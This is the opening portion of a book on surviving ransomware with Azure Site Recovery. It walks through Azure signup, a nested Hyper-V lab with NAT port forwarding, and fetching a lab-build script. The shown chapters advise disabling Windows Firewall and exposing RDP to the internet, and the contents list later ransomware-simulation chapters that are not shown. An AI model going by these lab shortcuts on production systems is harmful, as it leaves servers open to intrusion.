Surviving a Ransomware Attack with Azure Site Recovery

Citation preview

Surviving a Ransomware Attack with Azure Site Recovery Volume 1

By Microsoft MVP’s: Dave Kawula Cristal Kawula Emile Cabot Cary Sun John O’Neill Sr - rMVP

PUBLISHED BY MVPDays Publishing http://www.mvpdays.com Copyright © 2019 by MVPDays Publishing All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means without the prior written permission of the publisher. ISBN: TBD Warning and Disclaimer Every effort has been made to make this manual as complete and as accurate as possible, but no warranty or fitness is implied. The information provided is on an “as is” basis. The authors and the publisher shall have neither liability nor responsibility to any person or entity concerning any loss or damages arising from the information contained in this book. Feedback Information We’d like to hear from you! If you have any comments about how we could improve the quality of this book, please don’t hesitate to contact us by visiting www.checkyourlogs.net or sending an email to [email protected].

iii

Acknowledgments

Foreword by Acknowledgments From Dave Cristal, you are my rock and my source of inspiration. For the past 20 + years you have been there with me every step of the way. Not only are you the “BEST Wife” in the world you are my partner in crime. Christian, Trinity, Keira, Serena, Mickaila, Mackenzie, and Rycker, you kids, are so patient with your dear old dad when he locks himself away in the office for yet another book. Taking the time to watch you grow in life, sports, and become little leaders of this new world is incredible to watch. Thank you, Mom and Dad, (Frank and Audry) and my brother Joe. You got me started in this crazy IT world when I was so young. Brother, you mentored me along the way both coaching me in hockey and helping me learn what you knew about PCs and Servers. I’ll never forget us as teenage kids working the IT Support contract for the local municipal government. Remember dad had to drive us to site because you weren’t old enough to drive ourselves yet. A great career starts with the support of your family, and I’m so lucky because I have all the support one could ever want. Last but not least, the MVPDays volunteers, you have donated your time and expertise and helped us run the event in over 20 cities across North America. Our latest journey has us expanding the conference worldwide as a virtual conference. For those of you that will read this book, your potential is limitless just expand your horizons, and you never know where life will take you.

iii

About the Authors

About the Authors Dave Kawula – Microsoft MVP Dave is a Microsoft Most Valuable Professional (MVP) with over 20 years of experience in the IT industry. His background includes data communications networks within multi-server environments, and he has led architecture teams for virtualization, System Center, Exchange, Active Directory, and Internet gateways. Very active within the Microsoft technical and consulting teams, Dave has provided deep-dive technical knowledge and subject matter expertise on various System Center and operating system topics. Dave is well-known in the community as an evangelist for Microsoft, 1E, and Veeam technologies. Locating Dave is easy as he speaks at several conferences and sessions each year, including TechEd, Ignite, MVP Days Community Roadshow, and VeeamOn. Recently Dave has been honored to take on the role of Conference Co-Chair of TechMentor with fellow MVP Sami Laiho. The lineup of speakers and attendees that have been to this conference over the past 20 years is fantastic. Come down to Redmond or Orlando in 2018, and you can meet him in person. Checkout his speaking site at www.davekawula.com He recently tied for 1st place out of 1800 speakers at the Microsoft Ignite Conference in Orlando. As the founder and Managing Principal Consultant at TriCon Elite Consulting, Dave is a leading technology expert for both local customers and large international enterprises, providing optimal guidance and methodologies to achieve and maintain an efficient infrastructure. BLOG: www.checkyourlogs.net Twitter: @DaveKawula

iv

About the Authors

Cristal Kawula – Microsoft MVP Cristal Kawula is the co-founder of MVPDays Community Roadshow and #MVPHour live Twitter Chat. She was also a member of the Technical Advisory board and is the President of TriCon Elite Consulting. Cristal is also only the 2nd Woman in the world to receive the prestigious Veeam Vanguard award. Cristal can be found speaking at Microsoft Ignite, MVPDays, and other local user groups. She is extremely active in the community and has recently helped publish a book for other Women MVP’s called Voices from the Data Platform. This year at Microsoft Ignite she lead community meetups for various topics such as Women in IT, Parenting in IT, Diversity in Tech, and becoming a Community Rockstar. BLOG: http://www.checkyourlogs.net Twitter: @supercristal1

v

About the Authors

Emile Cabot – Microsoft MVP Emile started in the industry during the mid-90s working at an ISP and designing celebrity web sites. He has a strong operational background specializing in Systems Management and collaboration solutions and has spent many years performing infrastructure analyses and solution implementations for organizations ranging from 20 to over 200,000 employees. Coupling his wealth of experience with a small partner network, Emile works very closely with TriCon Elite, 1E, and Veeam to deliver low-cost solutions with minimal infrastructure requirements. He actively volunteers as a member of the Canadian Ski Patrol, providing over 250 hours each year for first aid services and public education at Castle Mountain Resort and in the community.

BLOG: http://www.checkyourlogs.net Twitter: @ecabot

vi

About the Authors

Cary Sun – Microsoft MVP Cary Sun is CISCO CERTIFIED INTERNETWORK EXPERT (CCIE No.4531) and MCSE, MCIPT, Citrix CCA with over twenty years in the planning, design, and implementation of network technologies and Management and system integration. Background includes hands-on experience with multiplatform, all LAN/WAN topologies, network administration, E-mail and Internet systems, security products, PCs and Servers environment. Expertise is analyzing user’s needs and coordinating system designs from concept through implementation. Exceptional analysis, organization, communication, and interpersonal skills. Demonstrated ability to work independently or as an integral part of a team to achieve objectives and goals. Specialties: CCIE /CCNA / MCSE / MCITP / MCTS / MCSA / Solution Expert / CCA Cary’s is a very active blogger at checkyourlogs.net and always available online for questions from the community. He passion for technology is contagious, and he makes everyone around him better at what they do. Blog:http://www.checkyourlogs.net Twitter:@SifuSun

vii

About the Authors

John O’Neill Sr – Re-Connect Microsoft MVP

viii

Contents

Contents Foreword by .................................................................................................................. iii Acknowledgments ........................................................................................................ iii From Dave ............................................................................................................. iii About the Authors ........................................................................................................ iv Dave Kawula – Microsoft MVP .................................................................................... iv Cristal Kawula – Microsoft MVP ................................................................................... v Emile Cabot – Microsoft MVP ..................................................................................... vi Cary Sun – Microsoft MVP ......................................................................................... vii John O’Neill Sr – Re-Connect Microsoft MVP .......................................................... viii Contents........................................................................................................................ ix Introduction ................................................................................................................. 14 MVPDays Online .......................................................................................................... 14 Sample Files ............................................................................................................. 15 Additional Resources ................................................................................................ 15 Chapter 1...................................................................................................................... 17 Setting up your Azure Subscription from Scratch .................................................... 17 Chapter 2...................................................................................................................... 24 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure ........... 24 ix

Contents

Building a Windows Server 2016 Virtual Machine ................................................ 24 Creating Multiple Internal and External IP’s for the Lab ........................................ 35 Enable Hyper-V in the LAB Virtual Machine ......................................................... 42 Configuring NAT Networking with one Public IP Address ..................................... 50 Configuring NAT Networking with Multiple Public IP Address ................................... 53 Adding an IP Address to the lab Host (VM) .......................................................... 53 Configuring Routing and Remote Access on the Azure Nested Virtual Machine... 57 Configure NAT Rules in RRAS for the Lab ........................................................... 65 Disable Windows Firewall .................................................................................... 72 Create a NAT Rule in the Azure NSG for the Lab................................................. 74 Testing the NAT Rules in the lab .......................................................................... 80 Using PowerShell to automate RRAS NAT Rule Configurations........................... 85 Chapter 3...................................................................................................................... 88 Using BigDemo to Build your Lab .............................................................................. 88 Lab Server Names .................................................................................................... 88 Building the Lab with BigDemo_ASR_WAC.PS1 ...................................................... 91 Chapter 4...................................................................................................................... 95 Configuring Windows Admin Center ......................................................................... 95 Install Google Chrome and Mozilla FireFox .......................................................... 96 Configure Windows Admin Center........................................................................ 97 Configure Azure Integration.................................................................................. 99 Configure Azure Backup .................................................................................... 104 Verifying Backups locally with the Backup Microsoft Azure Backup Agent ......... 110 Configuring Windows Azure Update Management ............................................. 112 x

Contents

Configure Azure Site Recovery .......................................................................... 119 Upgrade to Security Center Standard in Azure ................................................... 125 Chapter 5.................................................................................................................... 127 Windows Defender Advanced Threat Protection ATP ............................................ 127 Onboarding a Server with Windows Defender ATP ............................................ 128 Reviewing an Incident with Windows Defender Advanced Threat Protection ..... 130 Chapter 6.................................................................................................................... 133 Simulating a Ransomware Attack ............................................................................ 133 KnowBe4 Ransomware Simulator on Windows Server 2019.............................. 133 Enabling Ransomware Protection on Windows Server 2019 .............................. 141 Executing a Ransomware Attack with PowerShell .............................................. 145 Chapter 7.................................................................................................................... 152 Recovering from Ransomware using Azure Site Recovery ................................... 152 Notes from the Field................................................................................................ 152 Why Airgapped Replicas are the only choice ..................................................... 152 Why Planned Failover is no longer an option ..................................................... 152 Failover Now is the only Option .......................................................................... 153 Watch you Six (Clock) ........................................................................................ 153 Do not connect your Azure Site Recovery Virtual Machines to a live Site-to-Site VPN ................................................................................................................... 154 When can I get back into my data? .................................................................... 154 Ok, so I didn’t listen and lost everything now what? ........................................... 155 Don’t forget to tune your Replication Policy ........................................................ 156 Testing Failover can be a quick Ransomware Fix .............................................. 156 xi

Contents

Reset Settings for your Azure Site Recovery Hyper-V Host................................ 157 Enable Diagnostic Logging for Azure Site Recovery........................................... 162 Zero Day time to Failover ........................................................................................ 163 Assuming an Admin Level breach Failing over 100 % to Azure .......................... 163 Executing a PowerShell based Ransomware Attack on Domain Controllers. ..... 163 Encrypting the Sysvol Folder .............................................................................. 165 Taking Down Production Killing Domain Controllers with Ransomware .............. 171 Encrypting the Active Directory Database .......................................................... 171 Survival Mode Recovering to Azure ........................................................................ 178 Tick Tock time to make a decision – We are Recovering to Azure ..................... 179 Performing the Double Swing Recovery ............................................................. 180 Chapter 8.................................................................................................................... 188 Disaster Recovery items left forgotten .................................................................... 188 Chapter 9.................................................................................................................... 189 Join us at MVPDays and meet great MVP’s like this in person .............................. 189 Live Presentations .................................................................................................. 189 Video Training......................................................................................................... 189 Live Instructor-led Classes ...................................................................................... 190 Consulting Services ................................................................................................ 190

xii

Contents

xiii

Introduction MVPDays Online

Introduction

MVPDays Online The purpose of this book is to showcase the fantastic expertise of our guest speakers of MVPDays Online. They have so much passion, expertise, and expert knowledge that it only seemed fitting to write it down in a book.

MVPDays was founded by Cristal and Dave Kawula back in 2013. It started as a simple idea; “There’s got to be a good way for Microsoft MVPs to reach the IT community and share their vast knowledge and experience in a fun and engaging way” I mean, what is the point in recognizing these bright and inspiring individuals, and not leveraging them to inspire the community that they are a part of. We often get asked the question “Who should attend MVPDays”? Anyone that has an interest in technology is eager to learn and wants to meet other like-minded individuals. This Roadshow is not just for Microsoft MVP’s it is for anyone in the IT Community. Make sure you check out the MVPDays website at www.mvpdays.com. You never know maybe the roadshow will be coming to a city near you. The goal of this particular book is to show you how to survive a Ransomware Attack using Azure Site Recovery. Each chapter is broken down into a unique tip, and we hope you find some immense value in what we have written.

14

Introduction MVPDays Online

Sample Files All sample files for this book can be downloaded from www.checkyourlogs.net and https://github.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery

Additional Resources In addition to all the tips and tricks provided in this book, you can find extra resources like articles and video recordings on our blog http://www.checkyourlogs.net

15

Introduction MVPDays Online

16

Chapter 1 Setting up your Azure Subscription from Scratch

Chapter 1

Setting up your Azure Subscription from Scratch As we know, there are lots of features in Microsoft Azure, to use those features, you need to create a Microsoft Azure account, it’s straightforward to create, also you will get $200 credits at the first month. If you are a newcomer on Microsoft Azure, no worry, I am going to show you how to create Azure free account with $200 credit today, follow the steps as below.

1. Go to https://www.azure.com and then click Free account.

17

Chapter 1 Setting up your Azure Subscription from Scratch

2. On the free account page, click Start free.

3. If you have an account with Microsoft already (e.g., office 365, outlookf.com …. ), enter your email address and then click Next. If you don’t have Microsoft account, please click Crete one.

4. If your email address is used with more than on account from Microsoft, you need to select which account do you want to use.

18

Chapter 1 Setting up your Azure Subscription from Scratch

5. Enter your password and then click Sign in

19

Chapter 1 Setting up your Azure Subscription from Scratch

6. On the About you page, enter your personal information and then click Next.

7. On the Identity verification by card page, you need to enter your credit card information and then click Next. Don’t worry, Microsoft won’t charge you until you upgrade your free

20

Chapter 1 Setting up your Azure Subscription from Scratch

account to pay as you go or others account type.

8. On the Agreement page, select I agree to the subscription agreement, offer details, and privacy statement and I would like information, tips, and offers from Microsoft or selected partners about Azure, including Azure Newsletter, Pricing updates, and other

21

Chapter 1 Setting up your Azure Subscription from Scratch

Microsoft products and services, and then click Sign up.

9. Congratulation! You’re ready to start with Azure and get $250 create for free. You need to click Go to the portal and enjoy Azure features there.

10. That’s it you have now successfully setup your first Azure Tenant and have access to the Azure Portal.

22

Chapter 1 Setting up your Azure Subscription from Scratch

23

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Chapter 2

Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure In this chapter, we are going to show you how to build a Hyper-V nested VM with multiple public IP addresses. In this lab configuration, you only need to pay Microsoft for one Hyper-V host (VM) with storage and public IP addresses. After it is configured, you can install a firewall, create VMs, a load balancer, configure customer routing, port forwarding and so on. These scenarios can be used to build up real-world labs for Test, Development, or even proof of concepts.

Building a Windows Server 2016 Virtual Machine 1. Logon to your Microsoft Azure Account and select Create a resource.

24

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

2. On the New page, select Windows Server 2016 VM

3. On the Create a virtual machine page, click Basics and select your Azure Subscription to pay for this virtual machine.

4. Select Create new under the Resource group and enter resource group name, I will recommend it as your virtual machine name, because it will easy to maintain your

25

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

resources, and then click OK.

5. Virtual Machine Name: Enter Virtual Machine Name as your resource group name. Region: Select Region for the virtual machine. For my case, I am using West US 2. Availability options: keep the default setting Image: select Windows Server 2016 Datacenter Size: click change size and select the Dv3 and Ev3 VM sizes. Because we need to enable nested virtualization. Username: Enter login user name Password: Enter login password

26

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Confirm password: Reenter login password

Public inbound ports: Select Allow selected ports. Select inbound ports: Select RDP (3389) Already have a Windows license: Select Yes if you have a license already. Confirmation: select I confirm I have an eligible Windows license with Software Assurance or Windows Server subscription to apply for this Azure Hybrid Benefit.

27

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

6. On the Create a Virtual Machine page, click Disks.

OS disk type: Select Premium SSD DATA DISKS: Select Create and attach a new disk (this storage space is for your nested VMs)

28

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

7. On the Create a new disk page, settings as follow and then click OK. Disk type: Select Premium SSD Name: keep the default name Size(GiB): 4095 Source type: None

29

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

8. On the Create a virtual machine page, click Networking.

Virtual network: Select vnet if you have existing vnet if not, you can keep the default settings. Subnet: Select subnet name if you have an existing subnet; if not, you can keep the default settings. Public IP: click Create new

30

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

9. On the Create Public IP address page, the settings are as follows Name: Enter the Public IP address name. SKU: Basic Assignment: Static 10. To complete Networking settings as follow: Network security group: Basic Public inbound ports: Allow selected ports Select inbound ports: RDP

31

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Accelerated networking: On

1. On the Create a virtual machine page, click Management and keep the settings as default.

32

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

11. On the Create a virtual machine page, click Guest config and keep the settings as default.

12. On the Create a virtual machine page, click Tags and keep the settings as default.

33

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

13. On the Create a virtual machine page, click Review + create and make sure Validation passed and then click Create.

34

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Creating Multiple Internal and External IP’s for the Lab 1. On the Microsoft Azure portal page, select Virtual machines.

2. On the Virtual machines page, click GDMCALABHV1.

35

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

3. On the GDMCALABHV1page, select Networking.

4. On the GDMCALABHV1-Networking page, select Network Interface: gdmcalabhv1238.

5. On the Network Interface page, select IP configurations.

36

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

6. On the IP configurations page, select ipconfig1.

7. Change assignment setting from Dynamic to Static, and then click Save.

8. Go back to the IP configurations page, click Add.

9. On the Add IP configuration page, settings as follow and then click OK. 37

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Name: ipconfig2 Private IP address Allocation: Static IP address: 10.10.1.9 Public IP address: Enable IP address: click configure required settings

10. Choose public IP address: Create new Name: Enter name for Public IP SKU: Basic

38

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Assignment: Static and then click OK

Choose public IP address: Create new Name: Enter name for Public IP SKU: Basic Assignment: Static and then click OK

39

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

11. On the Add IP configuration page, click OK.

40

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

12. Repeat Add IP configurations steps If you need more public IP addresses.

41

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Enable Hyper-V in the LAB Virtual Machine 1. Start Azure virtual machine and log in. 2. Open Disk Management to partition and format for your new 4TB storage space. (Use ReFS + 64 KB Block Size.)

42

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

3. On the Server Manager Dashboard, click Add roles and feature.

4. On the Before you begin page, click Next.

43

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

5. On the Select installation type, select Role-based or feature-based installation and then click Next.

6. On the Select destination server page, click Next.

44

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

7. On the Select server roles page, select Hyper-V, click Add Features and then click Next.

8. On the Select features page, click Next.

45

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

9. On the Hyper-V page, click Next.

10. On the Create Virtual Switches page, don’t select any interface and click Next.

46

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

11. One the Virtual Migration page, click Next.

12. On the Default Stores page, you can change the default location to your new 4TB storage space and then click Next.

47

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

13. On the Confirm installation selections page, select Restart the destination server automatically if required and then click install.

14. Login to Azure Virtual machine after it restarted. 15. On the installation progress page, click Close.

48

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

49

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Configuring NAT Networking with one Public IP Address To configure NAT Networking, we need to create an Internal Virtual Switch for nested guest VMs. In general, there are two options for networking with nested virtual machines, MAC Address Spoofing, and NAT networking. Unfortunately, MAC Address Spoofing is not possible in a public cloud environment. So, If you are using an Azure virtual machine network interface as your Hyper-V external virtual switch and have assigned it to nested guest VMS, the guest VMs won’t be able to access the Internet. At this point, we have no choice, but to use NAT networking. The steps below show how to configure a NetNat Virtual Switch with a single Public IP Address.

1. We can create an internal virtual switch and create NAT rules via Powershell cmdlet as follow:

NNew-VMSwitch -Name "NATNetwork" -SwitchType Internal Get-NetAdapter New-NetIPAddress -IPAddress 192.168.100.1 -PrefixLength 24 InterfaceIndex 14 New-NetNat -Name "NATNetwork" -InternalIPInterfaceAddressPrefix 192.168.100.0/24

50

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

2. You also can configure port forwarding by Powershell cmdlet as follow:

Add-NetNatStaticMapping -ExternalIPAddress "0.0.0.0/24" -ExternalPort 443 -Protocol TCP -InternalIPAddress 192.168.100.99 -InternalPort 443 NatName NatNetwork

51

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Add-NetNatStaticMapping -ExternalIPAddress "0.0.0.0/24" -ExternalPort 80 -Protocol TCP -InternalIPAddress 192.168.100.99 -InternalPort 80 -NatName NatNetwork

52

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Configuring NAT Networking with Multiple Public IP Address For a real proof of concept (PoC) or production environment, we may need more than one public IP address. We have found that this isn’t possible with the NetNat Internal vSwitch. As a result, we have figured out how to set this up using Microsoft Routing and Remote Access on the Host (Azure VM). Following these steps are going to be the most critical part of this book. These steps allow us to add as many External Public IP Addresses in Azure and NAT them into our Lab Virtual Machines. This gives you the most realistic lab experience possible.

Adding an IP Address to the lab Host (VM) 1. Login to Azure Virtual Machine. 2. Open Command prompt and run ipconfig /all and then write down the DNS IP address. 3. Add all of the IP addresses to the Azure Virtual Machine network interface, for my case are 10.10.1.8-10

53

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

4. Re-run ipconfig /all again, and you will now see all of IP addresses under the network interface.

5. Open Hyper-V Manager tool and click Virtual Switch Manager.

54

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

6. Select Internal and click Create Virtual Switch.

55

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

7. Change switch name to NAT Network Switch and then click OK.

8. Assign IP address as 192.168.100.1/24 to vEthernet (NAT Network Switch)

56

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Configuring Routing and Remote Access on the Azure Nested Virtual Machine To configure Port Forwarding (NAT) into our lab we will use the Built-In Routing and Remote Access role in Windows. The steps below will walk you through the configuration required.

1. 1. 2. 3. 4. 5. 6. 7. 8.

Login to the Nested Azure Virtual Machine. On the Dashboard page, select Add Roles and features On the Before you begin page, click Next. On the Select installation type page, click Next. On the Select destination server page, click Next. On the Select server roles page, select Remote Access and click Next. On the Select features page, click Next. On the Remote Access page, click Next. On the Select Role Services page, select Routing and click Add Features and then click Next.

9. On the Web Server Role (IIS) page, click Next. 57

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

10. On the Select role services page, click Next. 11. On the Confirm installation selections page, select Restart the destination server atomically if required, click Install.

12. On the Installation progress page, click Close. 13. Open Routing and Remote Access tool.

58

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

14. Right-click the server name and select Configure and Enable Routing and Remote Access.

15. On the Welcome page, click Next.

59

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

16. On the Configuration page, select Network address translation (NAT), click Next.

60

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

17. On the NAT Internet Connection page, select Ethernet 2 as public Interface, click Next.

61

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

18. On the Name and Address Translation Services page, select Enable basic name and address services, click Next.

62

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

19. On the Address Assignment Range page, click Next.

63

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

20. Click Finish on the Completing setup wizard page.

64

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Configure NAT Rules in RRAS for the Lab 1. Open Routing and Remote Access, Expand the IPv4 and select NAT.

2. Right-click Ethernet 2 and select Properties.

65

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

3. Select Address Pool and click Add.

66

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

4. Enter IP addresses and mask and click OK, those IP addresses are being created with Public IP addresses at the azure portal.

67

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

5. Select Services and Ports and then click Add.

6. Settings as follow for TCP port 443 port forwarding and then click OK. Description of Services: TCP443-10.10.1.10 On this address pool entry: 10.10.1.10 Protocol: TCP Incoming port: 443 Private IP address: 192.168.100.99

68

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Outgoing port: 443

7. On the Ethernet 2 properties page, click OK.

69

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

8. You can repeat steps to create it for port 80 and port 3389 as well.

70

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

71

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Disable Windows Firewall 1. We will use Azure NSG, so please disable windows firewall at Azure Virtual Machine. 2. On the Server Manager page, select Local Server and then select Windows Firewall Public ON, Private On.

3. On the Windows Firewall page, select Turn Windows Firewall on or off.

72

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

4. On the customize page, select turn off Windows Firewall on Private Network and Public Network and then click OK.

73

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Create a NAT Rule in the Azure NSG for the Lab The following steps will show you how to create a NAT Rule on the Azure NSG. 1. Go back to the Azure portal and log in with your account. 2. On the Dashboard page, select Virtual machines.

74

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

3. On the Virtual machines page, select the Virtual machine which you are using as Hyper-V host.

4. One the GDMCALABHV1 virtual machine page, select Networking.

75

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

5. On the Networking page, click Add inbound port rule.

76

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

6. On the Add inbound security rule, change Destination port rages to 443, Protocol to TCP, Name to Port_443 and then click Add.

77

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

78

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

7. Repeat steps to add port 80.

79

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Testing the NAT Rules in the lab Now, we can test the port forwarding functionality and make sure it is working.

1. Create a Guest Virtual Machine on the Nested Azure Host (VM). Make sure the network adapter is configured to use the NAT Network Switch, and assign IP address of 192.168.100.99/24, the default gateway is 192.168.100.1, you can use the 8.8.8.8 as DNS.

80

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

81

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

2. Enable remote desktop for test RDP (TCP port 3389) and turn off Windows firewall.

3. Install IIS features on this machine. If you would like to test SSL (Port 443) setup and configure the SSL Certificate in IIS.

82

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

4. Let’s do RDP to from Internet to Web-Test machine via Public IP address (GDMCALABHV1-PublicIP3).

5. If you can successfully connect your NAT Rules are working through the Azure NSG and also through the RRAS configuration on the Nested Host in Azure.

6. Next, test Port 80 from the internet via (GDMCALABHV1-PublicIP3), and it will show you the default IIS website. This also validates that the Port Forwarding is working.

83

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

7. Last you can validate the NAT Session Mapping on the Azure Nested Host (VM) using the Routing and Remote Access tool.

84

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Using PowerShell to automate RRAS NAT Rule Configurations Configuring NAT Rules in Routing and Remote Access can be very time consuming and tedious. In the steps below we will show you how to bulk configure rules using PowerShell. First, review the following code: $Port=1000 $HostInterfaceName="Ethernet 4" $Protocol="TCP" $PublicIP="10.10.1.101" $PrivateIP="192.168.100.101" for ($Port=1000; $Port -le 1010; $Port++) {netsh routing ip nat add portmapping name=$HostInterfaceName proto=$Protocol publicip=$PublicIP publicport=$Port privateip=$PrivateIP privateport=$Port }

This will create a Custom Service (NAT Rule) in Routing and Remote Access on Interface Ethernet 4, TCP, Ports 1000-1010.

Let’s run the script and see what happens.

85

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

You can also run netsh routing dump to see the output.

Overall, this is an easy way to automate the creation of the NAT Rules for your lab.

86

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

87

Chapter 3 Using BigDemo to Build your Lab

Chapter 3

Using BigDemo to Build your Lab Lab Server Names The following table describes the required Virtual Machines to build this lab. This lab is designed to be built on a Hyper-V Host Server with a minimum of 16 GB of RAM. An automation script called BigDemo_ASR_WAC.ps1 has been used to provision this lab environment. You can download a copy from here: https://github.com/dkawula/Surviving-a-Ransomware-Attack-UsingAzure-Site-Recovery/blob/master/BigDemo_ASR_WAC.ps1

88

Chapter 3 Using BigDemo to Build your Lab

Hostname

Role

Operating System

DC01

Primary Domain Controller running Active Directory Certificate Services as an Enterprise Root

Windows Server 2019

DC02

Secondary Domain Controller running Active Directory

Windows Server 2019

S2D2019-1

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

S2D2019-2

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

S2D2019-3

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

S2D2019-4

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

S2D2019-5

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

S2D2019-6

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

S2D2019-7

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

S2D2019-8

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

S2D2019DR-1

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

S2D2019DR-2

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

89

Chapter 3 Using BigDemo to Build your Lab

90

S2D2019DR-3

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

S2D2019DR-4

Storage Spaces Direct – HyperV Cluster Node LTSC

Windows Server 2019

DRTitan01

Standalone – Hyper-V Cluster Node LTSC

Windows Server 2019

Router01

Windows NAT Router for the LAB

Windows Server 2019

DHCP01

DHCP Server for the Lab

Windows Server 2019

Management01

Management01

Windows Server 2019

AZHVHost

DS8 Virtual Machine in Azure running Nested Virtualization and Hyper-V. This will be the host that we run the lab on. This could also be a Laptop or a physical server in your environment.

Windows Server 2019

Chapter 3 Using BigDemo to Build your Lab

Building the Lab with BigDemo_ASR_WAC.PS1 For this book, we wanted to help you build a lab that you could easily follow along with. If you have read some of our other books, you would have seen a script that we use called BigDemo. BigDemo is a PowerShell script that builds a lab environment including AD, DHCP, Management Servers, Clients, Application Servers, and others. It is highly customizable, and we have created an extraordinary edition just for this book. Follow the instructions below to download the script from our Github Repository and start building your very own lab to follow along with.

Instructions

Screenshot (if applicable)

1. Logon to the AZHVHost machine in Azure as Administrator 2. Open an administrative PowerShell prompt and type:

3. Next Download a copy of Windows Server 2016 RTM from the Microsoft Eval Center. For our lab, we have a drive on our Hyper-V Host F:\

Invoke-WebRequest -Uri " https://raw.githubusercontent.com/dkawula/Survivinga-Ransomware-Attack-Using-Azure-SiteRecovery/master/BigDemo_ASR_WAC.ps1" -OutFile "C:\Post-Install\BigDemo_ASR_WAC.PS1"

https://www.microsoft.com/en-us/evalcenter/evaluatewindows-server-2016/

91

Chapter 3 Using BigDemo to Build your Lab

Save the ISO to F:\DCBuild_Insider

